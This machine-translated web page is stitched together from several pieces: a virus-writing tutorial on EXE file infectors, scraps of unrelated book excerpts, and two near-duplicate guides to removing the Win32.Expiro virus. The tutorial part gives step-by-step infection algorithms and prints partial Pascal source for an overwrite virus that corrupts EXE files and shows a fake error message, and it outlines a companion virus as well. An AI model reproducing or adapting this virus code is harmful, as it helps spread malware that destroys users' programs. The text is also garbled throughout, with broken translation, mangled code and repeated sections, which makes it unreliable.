How to Clear EXE file from viruses. What is EXE-Viruses Methods of Combating them

This article talks about virusesinfecting EXE files. A classification is given virusesThe algorithms of their work are considered in detail, differences between them of dignity and disadvantages.

Viruses - this is a good gymnastics for mind, although many people think that write virus The high level language is very difficult. This is not quite so. Writing in Pascal language is quite easy, though the value of the resulting code causes a reverent thrill.

For each type viruses Presented source texts with detailed comments. Also the basic information about the structure and principles of work are presented. EX-program.

Som files (Small programs written mainly in the Assembler) slowly, but correctly stole. They come to change frightening with their size EXE-"Monsters". There are viruses who know how to infect EXE files.

Structure and process of loading EX-program

Unlike Som-program, EX-program May consist of several segments (codes, data, stack). They can occupy more than 64kb. EX-File It has a header that is used when loading it. The heading consists of a formatted part containing the signature and the data required for downloading EXE-FILE, and tables for setting up addresses ( Relocation Table). The table consists of values \u200b\u200bin the format segment: offset. To offsets in the boot module, which indicate the values \u200b\u200bin the table, after loading the program, the segment address from which the program is downloaded to memory must be added to the memory.

When starting EX-program system loader (Calling the DOS 4BH function) The following steps:

1. The segment address of the free area of \u200b\u200bmemory is determined, size

which is sufficient to place the program.

2. The memory block for environment variables is established and filled.

3. There is a memory unit for the PSP and the program (segmentation - PSP;

segment + Oyuuoo - Program).

The corresponding values \u200b\u200bare entered in the PSP fields.

4. Press DTA is set to PSP: 0080H.

5. The workloader workspace is read formatted

header EXE-FILE.

6. The length of the boot module by the formula is added:

Si7.e \u003d ((Pagecnt * 5i2) - (HDRSAE * i6)) - PA! TP3IG.

7. The displacement of the boot module in the file equal to

8. The segment address (START_SEG) is added to download - is a PSP + LOH.

9. The boot module (starting with the address

Start_seg: 0000).

10. For each setting table entry:

a) read the words i_off and i_seg;

b) RELC ^ SEG-START ^ SEG + LSEG is calculated;

c) the word is read at RELO_SEG: I_OFF;

d) Start_seg is added to the read:

e) The result is remembered along the same address (RELO_SEG: I_OFF).

11. The memory for the program is distributed in accordance with Makhmet

12. The registers are initialized, the program is executed:

b) ah \u003d result of verifying the correctness of the driver identifiers specified on the command line;

c) SS ° START_SEG + RELOSS, SP-EXESP;

d) CS \u003d START_SEG + RELOCS, IP \u003d EXEIP.

Classification of EXE viruses

EXE-VIRUS. Conditionally can be divided into groups using the characteristic of the algorithm as a trait. VirusesOverwrite.) Such viruses Already became a rarity. The main drawback is too rude work. Infected programs are not executed because virus It is written on top of the program code without saving it. When starting virus Looking for another sacrifice (or victim), opens a found file to edit and records its body to the beginning of the program, not saving the original code. Infected with these viruses Non-treatment programs are not subject to.

Satellite Viruses (Companion)

These viruses Received their name because of the reproduction algorithm:

a file-satellite is created to each infected file. Consider two types of viruses of this group in more detail:

Viruses the first type multiplied as follows. For each infected EXE-FILE The same directory creates a viral code file that has the same name as EX-Filebut with expansion Som.. Virus It is activated if only the name of the executable file is specified at the command prompt. The fact is that if the file extension is not specified, DOS. First seeks a file with the specified name and expansion in the current directory. Som.. If a SOM-File With this name not found, the search for the same name is being searched. EXE-FILE. If not found and EX-File, DOS will try to detect WAT. (batch) file. In the absence of an executable file in the current directory with specified name The search is conducted in all directories available by variable. Path.. In other words, when the user wants to run the program and dials only her name on the command prompt (basically so everything is done), the first control gets viruswhose code is in SOM-File. He creates SOM-File another one or more EXE-FILES(applies) and then executes EX-File with the name specified on the command line. The user thinks that only running EX-program.

Virus satellite neutralize quite just - just delete

Som file.

Viruses The second type act more subtle. Name infected

EXE-FILE remains the same, and the extension is replaced by any

another different from executable ( Som, exe and wat), For example,

file can get an extension Dat. (data file) or OVL. (pro-

gram overlay). Then in place EXE-FILE Copy viral the code. When you start such an infected program, management gets viral code located in EXE file. Infecting another or more EXE files in the same way virus Returns original file. executable extension (but not e Heh, and som, insofar as EX-File With this name is engaged in the virus), after which it performs it. When the operation of the infected program is completed, the extension is returned to its triggered file. Treatment of filesinfected with a virus of this type can be difficult if virus- Suitable encrypts a part or the entire body of the infected file, and before execution it decodes.

Virusesimplemented in the program (Parasitic) Viruses This type is the most invisible: their code is recorded in the infected program, which is essential comprehensive treatment infected files. Consider the methods of implementation EXE viruses in EX-file.

Ways to infection exe files

The most common way of infection EXE files Such: The body is finished at the end of the file. virusand the title is adjusted (with the original) so that when starting an infected file, the control received virus. Looks like infection Som filesBut instead of a task in the transition code to the beginning of the virus, the address of the program start-up is adjusted. After the end of the work, the virus takes out of the stored header the original address of the program startup, adds to its segment component the value of the DS or ES register (obtained when the virus start) and transfers control to the address received.

Next way - Implementing the virus to the beginning of the code shift file

programs. The mechanism of infection is this: body infected program read into memory, it is written to her place viral code, and after it - the code infected programss. Thus, the program code seems to be "shifted" in the file for the length of the virus code. Hence the name of the method - "shift method". When starting an infected file virus It infects another or more files. After that, it reads the program code into memory, writes it in a temporary file specifically created on the disk with the extension of the executable file ( Som or Ehe), and then executes this file. When the program finished work, the temporary file is deleted. If additional protection techniques have not been used when creating a virus, it is very easy to cure an infected file - just delete the virus code at the beginning of the file, and the program will again be operational. The disadvantage of this method is that the entire code of the infected program has to be read in memory (because there are more than 1MB instances).

Next way to infect files - The transfer method - apparently, is the most perfect one of all listed. Virus multiplies as follows: when starting a body infected program virus It is read from it. Then the search for an uninfected program is being found. The beginning is read in memory, the length of equal body Virus. The body is written to this place. virus. Programs from memory finishes at the end of the file. Hence the name of the method is the "transfer method". After virus Infected one or more files, it starts executing the program from which it started. To do this, it reads the beginning of the infected program saved at the end of the file, and records it to the beginning of the file, restoring the program performance. Then virus Deletes the program start code from the end of the file, restoring the original length of the file, and executes the program. After the program is completed, the virus reiterates its code to the beginning of the file, and the original start of the program is to the end. This method can even be infected antiviruswho check their code for integrity because the launched virus The program has exactly the same code as before infection.

VirusesSubstituting software code ( Overwrite. ) As already mentioned, this species viruseshas long been dead. Occasionally appear more virusestongue Assembler., but it is rather a competition in writing the smallest overwrite virus. At the moment, the smallest of the famous overwrite viruses written Reminder (Death Virii Crew Group) and takes 22 bytes.

Overwrite virus work algorithm Next:

1. Open the file from which the virus received control.

3. Close the file.

4. Search by mask suitable for infection.

5. If the files no longer found are no longer found, go to step 11.

6. Open the found file.

7. Check if the found file has been infected with this virus.

8. If the file is infected, go to clause 10.

9. Record the virus code to the beginning.

10. Close the file (optionally you can infect from one to all

fishing in the catalog or on the disk).

11. Any error message, such as "ABNORMAL PROGRAM TERMINATION" or "NOT ENOUGH MEMORY", - Let the user is not too surprised that the program has not started.

12. Complete the program.

Below is the listing of the program infecting the files in this way.

($ M 2048, 0, 0)

(DOS and SYSTEM modules are used (System module automatically connects to each compilation program))

(Virus name)

Virname \u003d 'Pain';

(Row to check for re-infection.

It adds to the infected file immediately after the code virus}

Virlabel: String \u003d 'Pain! 1;

(The length of the compilation EXE-FILE}

Author \u003d 'Dirty Nazi / Sgww.';

(The number of files infected in one session)

(Array to determine the presence of a copy virus in the found file)

Virldentifier: Array of Char;

(File variable for working with files)

(Another file variable - although without it it was possible to do, it will be clearer)

(For the name of the found file)

Targetfile: pathstr;

(Body buffer Virus)

Virbuf: Array [-i.Virlen] of Char;

(For dates / time file)

(Counting the number of infected files)

Dirlnfo: SearchRec;

Labelbuf: Array of Char;

(Initialization)

Labelbuf: \u003d Virlabel;

Labelbuf: \u003d Virlabel,

Labelbuf: \u003d Virlabel;

(Reset the number counter infected files}

(We associate the file variable Virbody with the name of the program from which started)

Assign (Virbody, Paramstr (O));

(Open the file with RecSize \u003d 1 byte)

RESET (Virbody, 1);

(Read the body from the file Virus In an area of \u200b\u200bVirbuf)

Blockread (Virbody Virbuf, Virlen);

(Close File)

(Search for victim)

procedure FindTarget;

(The function returns True if the program found is already infected, and False, if not yet)

function VirusPresent: Boolean;

VirusPresent: \u003d False;

(Open the file found)

Assign (Target, TargetFile);

RESET (Target, 1);

(Move for body length virus from the start of the file)

Seek (Target, Virlen);

(Read 5 bytes - if the file is already infected, there is a label virus}

Blockread (Target, Virldentifier, 5);

IF Virldentifier \u003d Virl_abel Thatn

(If there is a label, then there is and virus}

VirusPresent: \u003d True;

(Infection procedure)

procedure InfectFile;

(If the size of the found file is less than the length of the virus plus 100 bytes, then we leave the procedure)

If sr.size< VirLen+100 Then Exit;

If the program found is not yet infected, infecting it)

IF Not VirusPresent Then

(We will remember the date and time of the file. Do not remember attributes, as the search is carried out among the files with the Archive attribute, and this attribute is installed on the file after saving anyway)

(Open to infection)

Assign (Target, TargetFile);

RESET (Target, 1);

(Body Writing virus to the beginning of the file)

Blockwrite (Target, Virbuf, Virlen);

(Move the pointer of the current position and the length virus from the start of the file)

Seek (Target, Virlen);

(Enter the infection mark)

Blockwrite (Target, Labelbuf, 5);

(Install the date and time of the file)

SetFTime (target, time);

(Close)

(Increase the counter infected files}

(The beginning of the FindTarget procedure)

(We are looking for a mask file in the current directory * .EXE

with attributes Archive.}

Findfirstf.exe ', Archive, SR);

(While there are files for infection)

While Doserror \u003d 0 Do

If sr.name \u003d "then exit;

(Remember the name of the found file in the TargetFile variable)

Targetfile: \u003d sr.name;

(Call the procedure for infection)

(If infcount files infected, complete the search)

If infules\u003e infcounte the exit;

(We are looking for the following mask file)

(Main body)

(Initialize)

(We are looking for victims and infect them)

(We issue an error message to the screen)

Writeln ('Abnormal Program Termination.');

(This is that the compiler inserts into the ViRName and Author constant code, the condition is set in such a way that these lines will never be displayed)

Writeln (Virname);

Writeln (Author);

Satellite Viruses (Companion)

Satellite viruses Now widespread - the ratio of Companion and Parasitic viruses Approximately one to two. Creating a method Som File The satellite meaning of this method is not the touch of a "alien cat" ( EXE-PROGRAM), create "your" - SOM-File With name EX-program. The algorithm of the work of this virus It is extremely simple, as it disappears the need for unnecessary actions (for example, conservation in the body of the virus of the length of compiled EXE-FILE from viral code, read in body buffer Virusstartup file from which virus received control). There is no need to even store the label to determine the file infection.

Infection is made using the command processor:

1. If the parameters are specified on the command prompt, save them to variable type String to transmit an infected program.

2.Night EX-File-erttel.

3. Check if it is not present in the catalog with the found EXE-FILE SOM-File With the same name as the victim's file.

4.If such SOM-File is present, the file is already infected, go

to clause 6.

5. With the help of the command processor to copy the file from which

management received, to a file named victim and expansion Som..

6.Proturn Ezez Download and execute a file with the name of the start, but with the extension EXE - That is, to perform an infected program.

7. Return control to DOS.

The listing below shows the file infection by this.

($ M 2048, 0, 0)

(Used DOS and System modules (SYSTEM automatically module

connects to each program when compiling))

(Virus name)

Virname \u003d 'Guesf;

Author \u003d 'Dirty Nazi / SGWW. 4 Pvt Only! ';

(Number infected for one session of files)

(For the name of the found file)

Targetfile: pathstr;

Methods for infection of EXE files

The most common way to infect EXE files is such: the body of the virus is added to the end of the file, and the title is adjusted (with the original) so that when starting an infected file, the control received a virus. It seems that the contamination of the COM files, but instead of a task in the transition code to the beginning of the virus, the address of the program start-up is adjusted. After the end of the work, the virus takes out of the stored header the original address of the program startup, adds to its segment component the value of the DS or ES register (obtained when the virus start) and transfers control to the address received.

The following method is the introduction of a virus to the beginning of the file with the shift of the program code. The mechanism of infection is this: the body of the infected program is read into memory, the viral code is written to its place, and after it is the code of the infected program. Thus, the program code seems to be "shifted" in the file for the length of the virus code. Hence the name of the method - "shift method". When you start an infected file, the virus infects another or more files. After that, it reads the program code into memory, writes it into a temporary file specifically created on the disk with the extension of the executable file (COM or EXE), and then executes this file. When the program finished work, the temporary file is deleted. If additional protection techniques have not been used when creating a virus, it is very easy to cure an infected file - just delete the virus code at the beginning of the file, and the program will again be operational. The disadvantage of this method is that the entire code of the infected program has to be read in memory (because there are more than 1MB instances).

The following way to infect files - the transfer method - apparently, is the most perfect one of all listed. The virus is multiplied as follows: when the infected program is started, the virus body is read from it into memory. Then the search for an uninfected program is being found. In memory, its beginning is read, the length of the virus is equal. The virus body is written to this place. The start of the program from memory is adding to the end of the file. Hence the name of the method is the "transfer method". After the virus infected one or more files, it starts executing the program from which it started. To do this, it reads the beginning of the infected program saved at the end of the file, and records it to the beginning of the file, restoring the program performance. Then the virus deletes the code start code from the end of the file, restoring the original length of the file, and executes the program. After the program is completed, the virus reiterates its code to the beginning of the file, and the original start of the program is to the end. Even antiviruses that check their integrity code can be infected with this method, since the program launched by the virus has exactly the same code as before infection.

From the book Protection of your computer Author Yaremchuk Sergey Akimovich

Signs of infection All Spyware and Adware (rare exception) do not apply clear harm to the computer and the user. Such an application can work on a computer for a long time, and the user will not suspect anything. Activities of such applications should not be unnoticed. TO

From the book of informatics and information Technology: lecture notes author of flowers and in

8.2. Methods of dealing with spam if to extract the ending of magazines of the late 1990s - early 2000s, it can be found that articles describing the fight against spam, they do not. Spammer's peak accounts for 2002-2003. At the same time, the active development of systems began

From book Computer Science and Information Technologies author of flowers and in

3. We will list the addressing methods and then consider the features of the basic types of targeting operands in memory: 1) direct addressing; 2) indirect basic (register) addressing; 3) indirect basic (register) addressing with displacement; 4) indirect index addressing

From the book to protect your computer 100% of viruses and hackers Author Fassetsev Oleg Mikhailovich

52. Methods for addressing Direct Addressing This simple view of the Operand addressing in memory, since the effective address is contained in the command itself and no additional sources or registers are used to form it. Effective address is taken

From the book 200. best programs For the Internet. Popular tutorial by Krainsky I.

Anti-virus products of 15 producers, including Avast !, Avg, Avz, Avira, BitDefender, Eset, F-Secure, McAfee, Panda Software, Sophos, Symantec, Trend Micro, Virus, Symantec, Trend Micro, Virus Bloka, " Dr. Web "," Kaspersky Lab ".Test was held on the following

From the book of the Internet. New opportunities. Tricks and effects Author Balovsyk Nadezhda Vasilyevna

Transmission Methods There are two ways to transmit streaming video - Serial (Progressive Streaming) and real-time streaming. If the image quality is always better transmitted, since the video is played with hard disk

From the book of the Internet - easy and simple! Author Alexandrov Egor

The paths of infection are the most popular ways of infection of the following. - via the Internet, the so-called "voluntary" way: when the user downloads anything from the network. Very often, a real Win95 can sit under the harmless accelerator of the browser. CIH (Win95. CIH, or

From book Fast money online Author

Ways to search in catalogs do not represent difficulties and intuitively understood. To find them necessary information (Unless, of course, it is present there), just just possess common sense. Let, for example, you need to find the site of the newspaper "Labor".

From the book Doubling Sales in the online store Author Parabelloum Andrei Alekseevich

From Linux book: Full guide Author Kolisnichenko Denis Nikolaevich

Payment methods Let's talk about the most pleasant in any work - about the salary. After all, money is one way or another are the main goal of your work. However, unfortunately, their receipt is associated with some difficulties arising from large distances between you and

Preparing for pensions: We master the Internet Author Akhmetzyanova Valentina Aleksandrovna

Signs of infection Consider the main signs indicating the likelihood of infection with your computer with a virus. Of course, most of them cannot communicate with one hundred percent accuracy that your computer is infected - part of the signs are sometimes observed in absolutely

From the book of the author

Methods of struggle viruses are evil, and with evil need to fight. However, first of all it is worth remembering one capital truth - the avoidance of war is better than any victory. For this reason, first of all it is necessary to minimize the risk of viruses from entering your computer, and only

From the book of the author

Payment methods with regard to payment methods in the online store, then you must provide our customers as many opportunities can pay for the order. As practice shows, the more choice of payment options, the higher the conversion (Fig. 15). If the client does not find

From the book of the author

26.1. Methods of interaction processes, like people, can "communicate" among themselves, that is, exchange information. In Chapter 3, we were fluent about two interprocessing interaction tools (IPC, Inter-Process Communication); half-duplex channels (conveyors) and signals, but in UNIX systems

From the book of the author

Methods for earning a pensioner is not so easy to find a job, and the only one, perhaps, the reason is age. But in the virtual space, age does not matter. Everyone is equal here: pioneers and pensioners, healthy and disabled. It all depends on the skill and

To date, most Internet users face a problem when the computer is infected with unusual viruses that have a negative impact on executable files. In addition, not all antivirus programs are able to cope with them.

It is worth dealing with what can be done in the current situation, as well as consider the problem of removing the "EXE" virus from the flash drive.

Principle of operation of viruses infecting EXE files

The problem with the activity of viruses of this species is not innovation. The most common today is a computer triang-pest, which is called Virus.win32.Expiro. Hit it on the Internet is not so difficult, it is much more difficult to get rid of the pest. This virus is able to delete exe files. More precisely, it makes them inaccessible to the user. Thus, when trying to open a specific program after the impact of a malicious virus code, the executable file is not recognized by the system. As a result, the message displays the message that the required object is not found. It is worth noting that this applies not only to the installed programs, but also to the first launch of the installer. We are talking about the distribution by downloaded from the Internet, which is on the hard disk.

If a program is installed from an optical media, the impact of the threat is able to manifest itself later when this process is completed. As you know, when installing from a USB drive, the virus jumps automatically to it, while infecting all the files that have extension .exe. However, the virus action can be recognized only when you start the executable file. Therefore, while this process is not implemented, most antivirus threat packages are not identified. Moreover, the presence of a virus is not determined at all.

Antivirus software problems

It is worth considering more importantly, and which way you can delete. The virus is able to get rid of EXE files or block them. This is not so important. In both cases, a stick about two ends. As you know, the problem is in blocking the files by the virus itself. At the same time, we are talking about the wrong reaction of antivirus programs. For example, today there are many cases when Avast package or any other antivirus with a user-defined scanning virus determines.

However, the result this process It only comes down to the fact that the program shows infected EXE files. When they are impossible to cure, it removes them on their own without warning. Thus, it is worth saying that the virus removes the EXE files is not self, but does it with hands antivirus scanner. It should be noted that the represented pest is able to create copies and even disguise under the system processes of the SVCHOST type.

The procedure for removing the virus when infected EXE files, if we consider the fight against a threat, is not so simple, as it may seem at first glance. First, it is advisable to abandon the use of free antivirus programs like AVAST, AVG and others. The ideal option will be the presence of Panda cloud antivirus system. It is recommended to use a powerful antivirus software Kaspersky Laboratories or ESET company. In addition, you can use the services of the Kaspersky Virus Removal Tool type utilities, but first the program must first be written to the optical media in the form of a portable version. To do this, an unselected computer is applied, and the launch is made from the CD or DVD.

If you do not adhere to these recommendations, it is difficult to guarantee successful treatment. In addition, you can use more simple programs Type Cureit. Their action is sent to the treatment of infected files, and not to remove them. Since the virus is usually in random access memory, the right decision will be the use of startup from an optical disk of programs familiar under the general name of Rescue Disc. They are able to check all components of the system before the start. Very often, this method becomes effective. It is worth noting that this technique is optimally suitable for flash drives. True, in this case, in the storage device scan settings, you must additionally set the mark on the USB media.

It is worth hoping that these recommendations will be useful for most users. They will help users to deal with the problem, how to remove the virus. If there is at least the slightest suspicion of its presence, it is not possible to run a single program undesirable until the full process is also recommended to get some Package of the type of Internet Security, which is capable of preventing the impact of the threat at the initial stage.

Today, many users from the network "pick up" several unusual viruses that affect executable files, and even so that not all antivirus programs are coping with them. Let us try to figure out what can be done in such a situation, and at the same time we consider the problem how to remove the "EXE" virus from the flash drive.

How do viruses infecting EXE files work?

The situation with the manifestation of the activity of viruses of this type is not Nova. It was before. The most common today is a computer triang-pest called virus.win32.expiro. (Versions "W", "AO", "BC", etc.).

You can pick it up on the Internet completely elementary, and then think what to do with it and how to remove. The virus deletes the EXE files, or rather, makes them inaccessible for execution. It is not surprising that when trying to open a program or application, as a result of the impact of a malicious code of the virus, the system does not recognize the executable file and gives a message that such a file is not found.

What is the saddest, it applies not only installed programsBut the first launch of the installer (meaning if the distribution is downloaded from the Internet and is on the hard disk). In the event of a program from an optical media, the impact of the threat can manifest itself later, after the installation process is completed. Probably, you should not say that when starting the installation process from a USB drive, the virus automatically jumps on it and infects all files having extension.exe.

But you can only recognize the virus action when you start the executable file. That is why, while the file is not running, some antivirus threat packets are not identified, and the presence of a virus is not determined at all.

Problems of antivirus software

Let's see what and how to delete. The virus deletes EXE files or blocks them, in this case it does not matter. But here, as it turns out, a stick about two ends. On the one hand, we are dealing with the blocking of the files by the virus itself, on the other, the incorrect reaction of antivirus programs.

So, for example, today there are quite a few cases, when the same Avast package with a user-defined scanning (and not when the threat is penetrated initially) the virus still determines. True, the definition is reduced only to the fact that it shows infected EXE files and due to the impossibility of treatment removes them without parsing. Here is the situation. It would seem that everything is simple: everyone knows what and how to remove. The virus deletes EXE files not even himself, but (paradox!) Does it with the hands of the anti-virus scanner. Naturally, such a pest is capable of creating its own copies and disguise even under system processes such as svchost.

How to remove the virus (exe files are infected)?

As for the struggle with such a threat, it's not easy here. First of all, most users can advise not to use free antivirus programs and utilities of the AVAST, AVG, etc. In the extreme case, it would be better to have a cloud antivirus type Panda.

Most the best way - Powerful anti-virus on Kaspersky Lab or ESET Corporation. By the way, you can resort to the services of the Kaspersky Virus Removal Tool utility, only first the program in the form of a portable version must be written on optical diskUsing an unnecessary computer for this, and run precisely from a CD or DVD carrier. Otherwise, successful treatment is not guaranteed.

You can also use small CureIt type programs that are treating infected files, and not delete them.

But since the virus, as a rule, "sits" in RAM, the most optimal solution will be the use of startup from the optical media of programs with the common name of the Rescue Disc.

They check all components of the system before its own start. In most cases, this method is effective. By the way, this technique is suitable for flash drives, only in the scanning parameters of storage devices will need to additionally put a tick on a USB media.

Conclusion

In general, it seems, some tips will help most users understand how to remove the virus. Deletes the EXE files of the virus itself or makes unauthorized locking of executable files, immediately and you will not understand. But if there is at least the slightest suspicion of its presence, it is extremely recommended to run any program before the end of the full scanning process, file treatment and threat removal.

Among other things, it is desirable to have in the system some package such as Internet Security, which can prevent the penetration of the threat at the initial stage.